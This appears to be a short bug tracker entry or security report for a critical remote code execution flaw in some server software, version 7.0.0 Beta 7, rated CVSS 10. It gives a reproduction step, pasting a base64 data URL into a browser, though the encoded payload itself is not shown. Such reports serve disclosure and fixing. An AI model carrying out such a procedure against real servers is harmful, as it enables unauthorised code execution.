Details

Description

Any user can remotely execute any Java code on the server.

Steps to reproduce:
1. Copy and paste into the browser URL bar:

data:text/html;base64,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

Expected result: no "Remote Code Execution" in logs
Actual result: "Remote Code Execution" in server logs

CVSS Base Score: 10
CVSS Temporal Score: 9
CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:P/RL:U/RC:C)
Packages

Version Package
7.0.0 Beta 7